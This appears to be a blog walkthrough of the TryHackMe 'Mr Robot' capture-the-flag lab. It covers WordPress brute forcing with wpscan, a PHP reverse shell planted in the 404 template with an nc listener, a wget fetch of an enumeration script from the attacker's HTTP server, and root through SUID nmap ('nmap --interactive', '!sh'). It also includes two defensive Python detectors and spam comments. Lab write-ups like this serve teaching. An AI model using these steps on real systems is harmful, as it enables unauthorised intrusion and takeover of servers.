TryHackMe Mr Robot CTF Walkthrough

This is my walkthrough for the Mr Robot room.

About TryHackMe

TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.

About Mr Robot machine

Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.

Scanning

Nmap

nmap 10.10.104.75 -sCV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-13 10:34 WAT
Nmap scan report for 10.10.104.75
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Enumeration

The open ports I focused on enumerating:

80/tcp
443/tcp

Web server port 80

On visiting the web page I found a website with an animation displayed in reference to the Mr Robot TV series. The animation ends at a screen that resembles a Linux terminal with a blinking cursor.


The first thing I do when I’m enumerating a web page is to check robots.txt.
On checking the /robots.txt file, I found an interesting wordlist and a key file:


fsocity.dic and key-1-of-3.txt

Requesting /key-1-of-3.txt in the URL, I got my 1st key:
073403c8a58a1f80d943455fb30724b9

I downloaded the “fsocity.dic” wordlist file for later use.

The wordlist has about 858160 lines, and many of the words are duplicated, so I sorted it and removed the duplicates (the original command redirected into a file named "sort"; -o writes the sorted result back to the same file):
sort -u fsocity.dic -o fsocity.dic

After looking around and not finding anything useful on the site, I decided to use Gobuster to enumerate the web directories.

Web Directory Enumeration

gobuster -u http://10.10.104.75 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403

Gobuster gave me more directories; looking at the directory list shows that the website runs WordPress.


WordPress Enumeration

I started enumerating the WordPress pages but could not find anything interesting, so I jumped to the login page, /wp-login.

I tried logging in with default credentials (admin:admin, admin:password), but the login attempts failed. After a long time enumerating usernames, I found elliot to be a valid user (taken from the Mr Robot television series character Elliot Alderson).

When I entered a wrong username, I got an "invalid user" error and a wrong password.

When I entered elliot, the user was accepted as valid but the password was wrong.


Remember the wordlist I downloaded earlier; I used it to brute-force the password of the user elliot.

Brute-forcing the user elliot

Using wpscan and the wordlist I found earlier, I got the login creds:

wpscan --url http://10.10.104.75/ -U elliot -P ~/Downloads/fsocity.dic

Elliot
ER28-0652
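From the defender's side, a brute force like the wpscan run above leaves a distinctive trace in the Apache access log: a burst of POSTs to wp-login.php that return 200 (WordPress re-renders the login form on failure) followed by a 302 (the redirect to wp-admin on success). The detector below is an added example, not part of the original write-up; the log lines, addresses and user agent string are constructed.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format lines (not from the original post).
SAMPLE_LOG = """\
10.9.1.5 - - [13/May/2020:10:41:01 +0100] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "WPScan (constructed UA)"
10.9.1.5 - - [13/May/2020:10:41:01 +0100] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "WPScan (constructed UA)"
10.9.1.5 - - [13/May/2020:10:41:02 +0100] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "WPScan (constructed UA)"
10.9.1.5 - - [13/May/2020:10:41:02 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan (constructed UA)"
10.9.1.7 - - [13/May/2020:10:41:03 +0100] "GET /robots.txt HTTP/1.1" 200 41 "-" "Mozilla/5.0"
10.9.1.7 - - [13/May/2020:10:41:05 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, request line and status code from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_wp_logins(log_text, threshold=3):
    """Summarise wp-login.php POST activity per client IP.

    Returns {ip: {"failed": n, "succeeded_after_failures": bool}} for every IP
    with at least `threshold` failed attempts. A 200 on POST /wp-login.php is a
    failed login; a 302 after `threshold` or more failures is flagged as a
    likely successful brute force.
    """
    stats = defaultdict(lambda: {"failed": 0, "succeeded_after_failures": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        rec = stats[m["ip"]]
        if m["status"] == "200":
            rec["failed"] += 1
        elif m["status"] == "302" and rec["failed"] >= threshold:
            rec["succeeded_after_failures"] = True
    return {ip: rec for ip, rec in stats.items() if rec["failed"] >= threshold}


if __name__ == "__main__":
    for ip, rec in analyse_wp_logins(SAMPLE_LOG).items():
        print(ip, rec)
```

Run it against a real access.log instead of SAMPLE_LOG; a single legitimate login (10.9.1.7 above) produces no alert because it has no run of failures before the redirect.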


Reverse shell

I was able to log into wp-admin using the creds I found.

Using the WordPress admin privileges that the user “elliot” has, we can get a reverse shell:

WordPress: Reverse Shell

Steps for getting a WordPress reverse shell:

  1. Go to Appearance > Editor > 404 Template and replace the PHP code with a PHP reverse shell. You can get it here: http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  2. Edit the following lines of php-reverse-shell.php with my local IP and the reverse shell port 443:
     $ip = '127.0.0.1'; // CHANGE THIS
     $port = 1234; // CHANGE THIS
  3. Update the script (save).
  4. Start an ncat listener on my system on the same port I specified in the script, 443:
  5. nc -lvp 443
  6. Visit the “/404” error page to trigger the reverse shell: http://10.10.104.75/404.php

I got a limited shell as daemon:

Spawn a TTY Shell

I upgraded my shell to a TTY shell, which lets me interact with it properly:

python3 -c 'import pty; pty.spawn("/bin/sh")'

export TERM=xterm


The daemon shell does not have the privilege to access all directories and files, but it can navigate some of the file system. I moved to the /home/ directory and found another directory for the user robot. The robot directory has 2 files.

One is the 2nd key; the other is an MD5 password hash for the user robot.

Daemon does not have read permission for key-2-of-3.txt; I can only read the key as robot. However, I do have read permission for the password.raw-md5 file, so I cat it and got robot's MD5 password hash. I cracked it on https://crackstation.net/ and obtained the password for the user robot.

User Robot

Using the password I obtained from the hash, I successfully logged in as robot and got the 2nd key:
su robot and input the password


Root Shell

The first thing I do when enumerating a machine for a root shell is to check what I can run with sudo -l.
I tried sudo -l with no luck; I can’t run any sudo command.

Privilege Escalation Script

Using a Python HTTP server, I was able to transfer lse.sh, a Linux privilege escalation enumeration script, to the machine.

Steps I used for that:

  1. I cd into the directory where my lse.sh script is and run python -m SimpleHTTPServer 8000 on my machine to start the Python server.
  2. On the Mr Robot machine, I cd into the /tmp directory and run wget 10.*.*.*:8000/lse.sh (http://IP:8000/lse.sh).
  3. chmod +x lse.sh
  4. Run ./lse.sh

After enumerating with lse.sh, I found in the results that nmap has the SUID bit set on the machine, which is interesting.

Checking GTFOBins, we can see how to leverage nmap to get root.

I ran the commands and got a root shell:

  • nmap --interactive
  • !sh
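The finding that lse.sh surfaced here, an unexpected SUID binary, is exactly what a host-hardening check should catch before an attacker does. The following audit is an added example, not code from the original write-up or from lse.sh: it compares the SUID files found on a host against an expected baseline and reports anything extra. The baseline set and the sample filesystem snapshot are constructed for illustration.

```python
import os
import stat

# Constructed allowlist of SUID binaries expected on this kind of host.
# A real baseline comes from a known-good build of the same image.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/usr/bin/newgrp"}


def unexpected_suid(entries, baseline=BASELINE_SUID):
    """Return the sorted paths of regular files carrying the setuid bit
    that are not in the baseline. `entries` yields (path, st_mode) pairs."""
    found = []
    for path, mode in entries:
        if stat.S_ISREG(mode) and mode & stat.S_ISUID and path not in baseline:
            found.append(path)
    return sorted(found)


def walk_modes(root):
    """Yield (path, st_mode) for every file under root, without following
    symlinks, so the same check can run against a live filesystem."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                yield p, os.lstat(p).st_mode
            except OSError:
                continue  # unreadable or vanished entry; skip it


# Constructed snapshot standing in for a walk of the target's filesystem;
# the nmap entry mirrors the condition described in the write-up.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755),
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755),
    ("/usr/local/bin/nmap", stat.S_IFREG | 0o4755),
    ("/usr/bin/python", stat.S_IFREG | 0o755),
    ("/tmp/lse.sh", stat.S_IFREG | 0o755),
]

if __name__ == "__main__":
    # Audit the real host; run as a user that can stat the directories of interest.
    for p in unexpected_suid(walk_modes("/")):
        print("unexpected SUID binary:", p)
```

Removing the setuid bit from nmap (chmod u-s) closes this particular escalation path; the audit is what tells you it needs doing.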


As root, I can move into any directory or run any command without restrictions.

I moved to the /root/ directory and obtained the 3rd key.

This is the end.

Thanks for reading this write-up. Stay tuned and follow me on Twitter to receive updates on more write-ups and thoughts on information security concepts.

Victoria Tegg
Guest

“Attractive section of content. I just stumbled upon your
site and in accession capital to assert that I acquire in fact enjoyed account your
blog posts. Anyway I will be subscribing to your augment
and even I achievement you access consistently fast.”

Putin
Guest

I got this website from my pal who told me concerning this website and at
the moment this time I am browsing this web site and reading very informative articles at this place.

Hannah Flack
Guest

“I like the helpful info you provide in your articles. I’ll bookmark
your blog and check again here frequently. I am quite sure I’ll learn lots of
new stuff right here! Good luck for the next!”

Hannah Flack
Guest

“Good post. I learn something new and challenging on websites I stumble upon every day.

It will always be interesting to read through articles from other writers and use a
little something from other websites.”